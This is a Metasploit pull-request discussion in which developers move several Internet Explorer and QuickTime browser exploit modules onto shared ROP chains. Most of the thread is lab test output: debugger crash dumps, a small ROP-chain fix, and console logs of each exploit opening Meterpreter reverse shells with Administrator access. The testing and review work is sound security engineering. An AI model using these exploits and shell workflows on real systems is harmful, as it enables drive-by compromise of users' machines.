[SeeRM 8458] Use RopDb mixin for browser exploits #2483

Merged
merged 6 commits into from Oct 9, 2013

@wchen-r7 wchen-r7 commented Oct 7, 2013

These browser exploits should be using ROP chains from RopDb. All the targets should be tested except for Windows Vista.

All targets tested except for Vista. Will need additional testing
during review.
All targets tested except for Vista, so additional testing will need
to be done during review.
All targets tested.
Target tested
@jvazquez-r7
Contributor

Starting to work on testing all these modules!

@todb
Contributor

todb commented Oct 9, 2013

By the way, @wchen-r7, if you want to link this change to a redmine ticket,
you need to use the SeeRM keyword in the commit description (or merge
commit, @jvazquez-r7), not the PR description. Redmine doesn't watch pulls,
just commits.

@jvazquez-r7
Contributor

Will take it into account!

@jvazquez-r7
Contributor

While testing IE8 / Win XP SP3 / msvcrt rop chain I'm getting this crash consistently with ie_cgenericelement_uaf. I've not been able to get any session on several tries:

0:028> g
ModLoad: 73940000 73a10000   C:\WINDOWS\system32\D3DIM700.DLL
ModLoad: 08ed0000 08f69000   C:\WINDOWS\system32\mstime.dll
(7a8.714): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000eb9d ecx=06e0e0dc edx=d2043f85 esi=77c2aacc edi=77c39f92
eip=06e0e147 esp=06e0e13c ebp=77c11120 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
06e0e147 0223            add     ah,byte ptr [ebx]          ds:0023:0000eb9d=??
0:008> dd esp
06e0e13c  06e0e13c 0000001b 0201db38 ffff0023
06e0e14c  31fcef83 57031557 f8ca6715 0135ee3a
06e0e15c  e4bc90bb 6ddb828a 20af12be d0fdd933
06e0e16c  d629afc0 d90c0561 b590a872 c46cabb1
06e0e17c  074c0be5 7a894af8 f0421ef3 44e78ea6
06e0e18c  c327af7b 1442d7c3 454c6db7 7d06fa68
06e0e19c  7cb6a402 378bb7c7 c67f036c f8805aa4
06e0e1ac  34bf3088 f3874905 07f33cf6 7ac0468a
0:008> kb 2
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
77c11120 00000000 7c80ba61 7c80cd27 7c812fc9 0x6e0e147

@wchen-r7, could you confirm if it's working/crashing for you on the described test case?

@wchen-r7
Contributor Author

wchen-r7 commented Oct 9, 2013

Yeah I tested that in this commit: 67228ba

If you switch back to upstream-master, does the exploit still work for you?

@jvazquez-r7
Contributor

checking right now! :)

@jvazquez-r7
Contributor

Working from master:

Juans-MacBook-Pro:metasploit-framework juan$ git checkout master
git feSwitched to branch 'master'
Juans-MacBook-Pro:metasploit-framework juan$ git fetch upstream
git rebase upstream/masterremote: Counting objects: 35, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 16 (delta 13), reused 16 (delta 13)
Unpacking objects: 100% (16/16), done.

From github:rapid7/metasploit-framework
   10cb0af..dfb0b11  refs/pull/2484/head -> upstream/pr/2484
 * [new ref]         refs/pull/2492/head -> upstream/pr/2492
 * [new tag]         sprint-C04 -> sprint-C04
Juans-MacBook-Pro:metasploit-framework juan$ git rebase upstream/master
giCurrent branch master is up to date.
Juans-MacBook-Pro:metasploit-framework juan$ git push origin master
./msfEverything up-to-date
Juans-MacBook-Pro:metasploit-framework juan$ ./msfconsole
Could not find rake-10.1.0 in any of the sources
Run `bundle install` to install missing gems.
Juans-MacBook-Pro:metasploit-framework juan$ rvm gemset use metasploit
Using ruby-1.9.3-p194 with gemset metasploit
Juans-MacBook-Pro:metasploit-framework juan$ ./msfconsole

blahblahblah

msf > use exploit/windows/browser/ie_cgenericelement_uaf 
msf exploit(ie_cgenericelement_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/Abkk2oENc7aKrkx
[*]  Local IP: http://10.6.0.165:8080/Abkk2oENc7aKrkx
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /Abkk2oENc7aKrkx
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:49396) at 2013-10-09 10:57:46 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:49396) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2320)
[*] Spawning notepad.exe process to migrate to


@jvazquez-r7
Contributor

  • Also failing ie_cgenericelement_uaf on Win2003SP2 / IE8
(6f8.168): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00000500 ecx=037660dc edx=7c8285ec esi=77e41fe3 edi=77bd8c05
eip=0376613e esp=03766134 ebp=77be2265 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
0376613e 0802            or      byte ptr [edx],al          ds:0023:7c8285ec=c3
0:008> kb
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
77be2265 00000000 0824448b dd1fe8c1 ba514005 0x376613e
0:008> dd esp
03766134  03766138 0000001b 0208db28 ffff0023
03766144  49b1c931 83195e31 5e03fcee 3289ce15
03766154  cb728765 2efbf776 3b9f2547 6eebf9fa
03766164  9ab972f7 ac16f68c 8340bc25 4f4d71b6
03766174  92311074 5d08f2a9 804df3bc ce06a14f
03766184  922255e2 98e4543e 5f812e7f 8f88840b
03766194  37c393a4 46f3fbce 01cf1803 93bbea28
037661a4  a24323f8 0a7aefc4 adbbeec9 cdb78532
0:008> dd esp -20
03766114  00000040 77bef001 77be2265 77be2265
03766124  03766138 ffff027f ffff4041 ffffffbe
03766134  03766138 0000001b 0208db28 ffff0023
03766144  49b1c931 83195e31 5e03fcee 3289ce15
03766154  cb728765 2efbf776 3b9f2547 6eebf9fa
03766164  9ab972f7 ac16f68c 8340bc25 4f4d71b6
03766174  92311074 5d08f2a9 804df3bc ce06a14f
03766184  922255e2 98e4543e 5f812e7f 8f88840b

@jvazquez-r7
Contributor

Full test results here: https://gist.github.com/jvazquez-r7/6903913. Available at the end of this PR.

The only exploit not working is ie_cgenericelement_uaf for Win XP SP3 and Win2003 SP2 / IE8 / msvcrt.

0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")

rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})

it should be:

        rop_payload = generate_rop_payload('msvcrt', align + p, {'target'=>'xp'})

@jvazquez-r7
Contributor

cool! last test and hopefully landing!

@jvazquez-r7
Contributor

ie_cgenericelement_uaf working again, on both WXPSP3 and W2003SP2

Landing!

Full testing results:

  • Windows XP SP3 - msvcrt
  • apple_quicktime_rdrf
msf exploit(apple_quicktime_rdrf) > [*] 192.168.0.3      apple_quicktime_rdrf - Requesting: /lm8f1vd34aMpf
[*] 192.168.0.3      apple_quicktime_rdrf - Target selected as: Quicktime 7.7.3 with IE 8 on Windows XP SP3
[*] 192.168.0.3      apple_quicktime_rdrf - Requesting: /lm8f1vd34aMpf/KALp.mov
[*] 192.168.0.3      apple_quicktime_rdrf - Target selected as: Quicktime 7.7.3 with IE 8 on Windows XP SP3
[*] 192.168.0.3      apple_quicktime_rdrf - Sending specially crafted .mov file
[*] 192.168.0.3      apple_quicktime_rdrf - Requesting: /lm8f1vd34aMpf/KALp.mov
[*] 192.168.0.3      apple_quicktime_rdrf - Target selected as: Quicktime 7.7.3 with IE 8 on Windows XP SP3
[*] 192.168.0.3      apple_quicktime_rdrf - Sending specially crafted .mov file
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:51486) at 2013-10-09 09:19:12 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:51486) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3336)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 932
[+] Successfully migrated to process 

msf exploit(apple_quicktime_rdrf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.135 - Meterpreter session 1 closed.  Reason: User exit

  • ms13_069_caret
msf exploit(ms13_069_caret) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/73uMjZTXrYt
[*]  Local IP: http://192.168.0.3:8080/73uMjZTXrYt
[*] Server started.
msf exploit(ms13_069_caret) > [*] 192.168.0.3      ms13_069_caret - Sending exploit...
[*] 192.168.0.3      ms13_069_caret - Sending exploit...
[*] 192.168.0.3      ms13_069_caret - Sending exploit...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:51566) at 2013-10-09 09:23:23 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:51566) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2384)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2608
[+] Successfully migrated to process 

msf exploit(ms13_069_caret) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
smeterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

  • ms13_055_canchor
msf exploit(ms13_055_canchor) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/pcbfzIZP
[*]  Local IP: http://192.168.0.3:8080/pcbfzIZP
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:51573) at 2013-10-09 09:24:47 -0500
[*] Session ID 2 (192.168.0.3:4444 -> 192.168.0.3:51573) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3588)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 320

msf exploit(ms13_055_canchor) > sessio[+] Successfully migrated to process 
ns -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
eComputer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.135 - Meterpreter session 2 closed.  Reason: User exit

  • ie_cgenericelement_uaf
msf exploit(ie_cgenericelement_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/FuFUWZ9OLiArJ
[*]  Local IP: http://10.6.0.165:8080/FuFUWZ9OLiArJ
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /FuFUWZ9OLiArJ
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:55369) at 2013-10-09 14:23:48 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:55369) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2316)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3392
[+] Successfully migrated to process 

msf exploit(ie_cgenericelement_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

  • ie_cbutton_uaf
msf exploit(ie_cbutton_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/djNjEKeOv
[*]  Local IP: http://192.168.0.3:8080/djNjEKeOv
[*] Server started.
msf exploit(ie_cbutton_uaf) > [*] 192.168.0.3      ie_cbutton_uaf - Requesting: /djNjEKeOv
[*] 192.168.0.3      ie_cbutton_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.0.3      ie_cbutton_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 3 opened (192.168.0.3:4444 -> 192.168.0.3:51788) at 2013-10-09 09:32:55 -0500
[*] Session ID 3 (192.168.0.3:4444 -> 192.168.0.3:51788) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (340)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2084

msf exploit(ie_cbutton_uaf) > sess[+] Successfully migrated to process 
ions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
smeterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.135 - Meterpreter session 3 closed.  Reason: User exit

Windows 7 SP1 - IE8 - msvcr71

  • ie_cbutton_uaf
msf exploit(ie_cbutton_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/qso8LANa
[*]  Local IP: http://192.168.0.3:8080/qso8LANa
[*] Server started.
msf exploit(ie_cbutton_uaf) > [*] 192.168.0.3      ie_cbutton_uaf - Requesting: /qso8LANa
[*] 192.168.0.3      ie_cbutton_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.3      ie_cbutton_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 4 opened (192.168.0.3:4444 -> 192.168.0.3:51867) at 2013-10-09 09:36:42 -0500
[*] Session ID 4 (192.168.0.3:4444 -> 192.168.0.3:51867) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2960)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3144
[+] Successfully migrated to process 

msf exploit(ie_cbutton_uaf) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
smeterpreter > sysinfo
eComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 4 closed.  Reason: User exit

  • ms13_055_canchor
msf exploit(ms13_055_canchor) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/yllhgcUaFdyrnTy
[*]  Local IP: http://192.168.0.3:8080/yllhgcUaFdyrnTy
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 192.168.0.3      ms13_055_canchor - Using JRE ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 5 opened (192.168.0.3:4444 -> 192.168.0.3:51875) at 2013-10-09 09:37:58 -0500
[*] Session ID 5 (192.168.0.3:4444 -> 192.168.0.3:51875) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3964)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1216
[+] Successfully migrated to process 

msf exploit(ms13_055_canchor) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
eComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

Windows 2003 SP2 - IE8 - msvcrt

  • ie_cbutton_uaf
msf exploit(ie_cbutton_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/CKI0db
[*]  Local IP: http://10.6.0.165:8080/CKI0db
[*] Server started.
msf exploit(ie_cbutton_uaf) > rexp[*] 10.6.0.165       ie_cbutton_uaf - Requesting: /CKI0db
[*] 10.6.0.165       ie_cbutton_uaf - Target selected as: IE 8 on Windows Server 2003
[*] 10.6.0.165       ie_cbutton_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:49523) at 2013-10-09 11:14:43 -0500
[*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:49523) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3564)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3716
[+] Successfully migrated to process 

[-] Unknown command: rexp.
msf exploit(ie_cbutton_uaf) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: JUAN-6ED9DB6CA9\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA9
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

  • ie_cgenericelement_uaf
msf exploit(ie_cgenericelement_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/1pvGZ2
[*]  Local IP: http://10.6.0.165:8080/1pvGZ2
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /1pvGZ2
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows Server 2003
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:55436) at 2013-10-09 14:27:16 -0500
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] 10.6.0.165 - Meterpreter session 2 closed.  Reason: Died

msf exploit(ie_cgenericelement_uaf) > 
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /1pvGZ2
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows Server 2003
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:55440) at 2013-10-09 14:27:27 -0500
[*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:55440) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3012)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3156
[+] Successfully migrated to process 

msf exploit(ie_cgenericelement_uaf) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
sServer username: JUAN-6ED9DB6CA9\Administrator
meterpreter > sysinfo
eComputer        : JUAN-6ED9DB6CA9
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(ie_cgenericelement_uaf) > 

jvazquez-r7 pushed a commit that referenced this pull request Oct 9, 2013
@jvazquez-r7 jvazquez-r7 merged commit 1e3b84d into rapid7:master Oct 9, 2013
@wchen-r7 wchen-r7 deleted the browser_rop_update branch August 22, 2016 16:22